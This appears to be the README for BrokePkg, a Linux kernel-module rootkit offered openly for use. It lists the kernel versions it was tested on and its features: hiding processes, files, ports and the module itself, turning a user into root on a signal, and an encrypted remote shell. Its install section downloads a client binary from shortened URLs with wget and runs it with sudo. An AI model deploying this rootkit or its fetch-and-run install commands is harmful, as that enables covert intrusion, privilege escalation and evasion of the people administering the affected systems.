BrokePkg
Brokepkg is a LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x and ARM64, with suport after kernel 5.7, without kallsyms_lookup_name
.
Tested on
- Arch linux: 5.13.12-arch1-1
- Kali linux: 5.10.0-kali3-amd64
- Linux mint: 4.19.0-8-amd64
- Debian 9(stretch): 4.9.0-15-amd64
- Ubuntu 16.04.6 LTS: 4.4.0-142-generic
Features
- Hide/unhide any process by sending a signal 63;
- Sending a signal 31(to any pid) makes the module become (in)visible;
- Sending a signal 64(to any pid) makes the given user become root;
- Files or directories starting with the PREFIX become invisible;
- Sending a signal 62 to some port you make he invisible;
- Full TTY/PTY shell and traffic encrypted with openssl
Install
wiki page
To install lkm, seeTo install client run this:
# client
sudo apt install socat
brokecli="https://git.io/JYAVw" # to 64 bits
brokecli="https://git.io/JYAVK" # to 32 bits
wget -q $brokecli -O brokecli
chmod +x brokecli
sudo ./brokecli
To view mini tutorial use go to releases
Uninstall
Remove brokepkg invisibility to uninstall him
kill -31 0
Then remove the module
sudo rmmod brokepkg
References
- LKM HACKING:
- Diamorphine:
- TheXcellerator:
- Conviso:
- HardDisk:
- Reptile: